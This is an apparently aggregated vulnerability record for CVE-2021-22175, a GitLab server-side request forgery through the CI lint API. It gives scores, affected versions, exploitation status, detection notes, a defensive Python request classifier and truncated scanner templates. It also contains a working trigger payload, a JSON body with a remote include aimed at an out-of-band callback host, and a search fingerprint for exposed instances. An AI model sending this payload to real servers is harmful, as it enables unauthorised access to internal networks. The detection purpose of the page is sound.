CVE-2021-22175
Published 2021-06-11
CVE-2021-22175: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5…
Priority P193 · critical · 9.8 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2026-03-11
Exploited in the wild
EPSS: 53.37% (98.9th percentile)
When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled
Affected (8 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | gitlab | < gitlab 15.10.8+ds1-2 (sid) | gitlab 15.10.8+ds1-2 (sid) |
| gitlab | gitlab | — | — |
| gitlab | gitlab | — | — |
| gitlab | gitlab | — | — |
| gitlab | gitlab | — | — |
| gitlab | gitlab | >= 10.5.0 < 13.6.7 | 13.6.7 |
| gitlab | gitlab | >= 13.7.0 < 13.7.7 | 13.7.7 |
| gitlab | gitlab | >= 13.8.0 < 13.8.4 | 13.8.4 |
Detection & IOCs (extracted from sources)
- url: POST /api/v4/ci/lint HTTP/1.1
- path: /api/v4/ci/lint
- path: /api/v4/ci/lint?include_merged_yaml=true
- command: {"include_merged_yaml":true,"content":"include:\n remote: 'http://{{interactsh-url}}/gitlab.yml'"}
- Detect unauthenticated POST requests to /api/v4/ci/lint containing a 'remote:' key pointing to internal/loopback addresses in the JSON body — this is the SSRF trigger endpoint for CVE-2021-22175.
- Match HTTP 200 responses from /api/v4/ci/lint with a JSON body containing 'does not have valid YAML syntax!' — this indicates the server attempted to fetch the remote URL (SSRF triggered).
- Monitor for unauthenticated POST requests to /api/v4/ci/lint with Content-Type: application/json, especially where the body includes 'include_merged_yaml' and a 'remote:' directive targeting internal network addresses.
- Use out-of-band (OAST/interactsh) detection: if the GitLab server initiates an outbound HTTP request to an attacker-controlled host after receiving a crafted /api/v4/ci/lint POST, SSRF is confirmed.
- Shodan/FOFA fingerprint for exposed GitLab instances: http.title:"GitLab" — use to identify potentially vulnerable internet-facing instances.
- The SSRF vulnerability is only exploitable when 'requests to the internal network for webhooks' is enabled in GitLab instance settings. If this option is disabled, the attack surface is significantly reduced.
- The vulnerability affects all GitLab CE/EE versions starting from 10.5. The Debian security tracker notes it was fixed in version 15.10.8+ds1-2 for the sid branch.
- This CVE is part of a cluster of related SSRF vulnerabilities in GitLab fixed across separate patches; detections may also apply to CVE-2021-39935 and CVE-2021-22214, which share the same attack vector.
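The first and third detection notes above describe a request-level rule (POST to /api/v4/ci/lint, JSON body whose embedded CI YAML carries a `remote:` include aimed at an internal address, no authentication). The following is an added example written for this page, not code from GitLab, Nuclei or any of the sources listed, of that rule applied to captured request records. The record layout, the use of the `PRIVATE-TOKEN`/`Authorization` headers as the authentication signal, and the sample records are constructed assumptions; the internal-address test uses the standard library's `ipaddress` module and also catches IPv6 loopback and link-local targets, which the note does not spell out.

```python
"""Added example for this page (not code from GitLab, Nuclei or the listed sources).

Classifies captured HTTP request records against the CVE-2021-22175 pattern:
a POST to /api/v4/ci/lint whose JSON body embeds CI YAML with an `include:`
`remote:` URL that points at a loopback, private or link-local address.
The record layout and the sample records below are constructed for the example.
"""
import ipaddress
import json
import re
from urllib.parse import urlsplit

CI_LINT_PATH = "/api/v4/ci/lint"

# Pulls the URL out of a `remote:` key in the embedded CI YAML. A regex rather
# than a YAML parser is used on purpose: per the detection notes the endpoint
# fetches the remote before reporting a syntax error, so malformed YAML must
# still be inspected.
REMOTE_RE = re.compile(r"remote:\s*['\"]?([^'\"\s]+)", re.IGNORECASE)

# Headers GitLab accepts for API authentication; their absence is the
# "unauthenticated" signal from the detection notes (assumption: the capture
# preserves request headers as sent).
AUTH_HEADERS = ("PRIVATE-TOKEN", "AUTHORIZATION")


def is_internal_host(host):
    """True when `host` is a literal IP in a loopback, private, link-local or
    unspecified range, or a localhost name. Hostnames are not resolved here
    (offline), so an internal name other than localhost is not caught."""
    host = host.strip("[]").lower()
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified


def remote_includes(body):
    """Return every `remote:` URL found in the `content` field of a lint body."""
    try:
        payload = json.loads(body)
    except (TypeError, ValueError):
        return []
    if not isinstance(payload, dict):
        return []
    content = payload.get("content")
    if not isinstance(content, str):
        return []
    return REMOTE_RE.findall(content)


def classify_request(rec):
    """Return (verdict, detail) for one request record.

    verdicts: "ignore" (not the lint endpoint), "observe" (lint without a
    remote include), "suspect" (remote include to a host not confirmed as
    internal), "alert" (remote include aimed at an internal address)."""
    if rec.get("method", "").upper() != "POST":
        return ("ignore", "not a POST")
    if urlsplit(rec.get("path", "")).path != CI_LINT_PATH:
        return ("ignore", "not the ci/lint endpoint")
    urls = remote_includes(rec.get("body", ""))
    if not urls:
        return ("observe", "ci/lint request without a remote include")
    headers = {k.upper() for k in rec.get("headers", {})}
    auth = "authenticated" if any(h in headers for h in AUTH_HEADERS) else "unauthenticated"
    for url in urls:
        host = urlsplit(url).hostname or ""
        if is_internal_host(host):
            return ("alert", f"{auth} remote include targeting internal host {host}")
    return ("suspect", f"{auth} remote include to {', '.join(urls)}")


def scan(records):
    """Classify a batch of records; returns [(index, verdict, detail), ...]."""
    return [(i, *classify_request(r)) for i, r in enumerate(records)]


# Constructed sample records (not real traffic).
SAMPLE_REQUESTS = [
    {   # unauthenticated lint request with a loopback remote include
        "method": "POST",
        "path": "/api/v4/ci/lint?include_merged_yaml=true",
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps({"include_merged_yaml": True,
                            "content": "include:\n  remote: 'http://127.0.0.1:8080/ci.yml'"}),
    },
    {   # authenticated request including a public URL: worth a look, not an alert
        "method": "POST",
        "path": "/api/v4/ci/lint",
        "headers": {"Content-Type": "application/json", "PRIVATE-TOKEN": "glpat-REDACTED"},
        "body": json.dumps({"content": "include:\n  remote: 'https://example.com/ci.yml'"}),
    },
    {   # ordinary lint of inline YAML
        "method": "POST",
        "path": "/api/v4/ci/lint",
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps({"content": "stages:\n  - test\n"}),
    },
    {   # unrelated API call
        "method": "GET", "path": "/api/v4/version", "headers": {}, "body": "",
    },
]

if __name__ == "__main__":
    for index, verdict, detail in scan(SAMPLE_REQUESTS):
        print(f"[{index}] {verdict:8s} {detail}")
```

The "suspect" verdict exists because a remote include naming a public hostname is not proof of anything on its own, while the "alert" verdict is reserved for targets the checker can prove are internal without DNS; feeding the query-string variant of the path through `urlsplit` keeps `?include_merged_yaml=true` from defeating the endpoint match.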
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| osv | — | 9.8 | CRITICAL | — |
| vulncheck | — | 6.8 | MEDIUM | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 6.8 | MEDIUM | — |
GHSA
GHSA-4gm2-v7j4-74p8 · ghsa_unreviewed · 2022-05-24 · CVE-2021-22175 [CRITICAL] · CWE-918
Description: as the CVE summary above.
OSV
osv · 2021-06-11 · CVSS 9.8 · CVE-2021-22175 [CRITICAL]
Description: as the CVE summary above.
VulnCheck
GitLab Server-Side Request Forgery (SSRF) Vulnerability · vulncheck · 2021 · CVSS 6.8 · CVE-2021-22175 [MEDIUM] · CWE-918
GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled.
Affected: GitLab GitLab
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References:
- https://www.greynoise.io/blog/new-ssrf-exploitation-surge
- https://app.crowdsec.net/cti/cve-explorer/CVE-2021-22175
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2026-03-11
CISA
GitLab Server-Side Request Forgery (SSRF) Vulnerability · cisa · 2026-02-18 · CVSS 9.8 · CVE-2021-22175 [CRITICAL] · CWE-918
Affected: GitLab GitLab
GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes:
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json
- https://nvd.nist.gov/vuln/detail/CVE-2021-22175
Remediation Due Date: 2026-03-11
GitLab
vendor_gitlab · 2021-06-11 · CVSS 6.8 · CVE-2021-22175 [MEDIUM] · CWE-918
Description: as the CVE summary above.
CISA KEV: GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Debian
CVE-2021-22175: gitlab · vendor_debian · 2021 · CVSS 6.8 · CVE-2021-22175 [MEDIUM]
Description: as the CVE summary above.
Scope: local
sid: resolved (fixed in 15.10.8+ds1-2)
No detection rules found.
Nuclei
Gitlab CE/EE 10.5 - Server-Side Request Forgery · nuclei · CVSS 9.8 · CVE-2021-22214 [CRITICAL]
GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
Template:
```yaml
id: CVE-2021-22214

info:
  name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
  author: Suman_Kar,GitLab Red Team
  severity: high
  description: |
    GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab i
```
Nuclei
GitLab CI Lint API - Server-Side Request Forgery · nuclei · CVSS 9.8 · CVE-2021-22175 [CRITICAL]
GitLab 10.5 and later contain a server-side request forgery caused by insecure handling of webhook requests, letting unauthenticated attackers exploit the server for arbitrary requests; the exploit requires sending crafted webhook requests.
Template:
```yaml
id: CVE-2021-22175

info:
  name: GitLab CI Lint API - Server-Side Request Forgery
  author: 0x_Akoko
  severity: high
  description: |
    GitLab 10.5 and later contain a server-side request forgery caused by insecure handling of webhook requests, letting unauthenticated attackers exploit the server for arbitrary requests, exploit requires sending crafted webhook requests.
  impact: |
    Unauthenticated attackers can perform arbitrary requests on internal network, potentially leading to information disclosure or
```
References:
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22175.json
- https://gitlab.com/gitlab-org/gitlab/-/issues/294178
- https://hackerone.com/reports/1059596
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22175
Timeline:
- 2021-06-11: Published
- 2026-02-18: Added to CISA KEV
- Exploited in the wild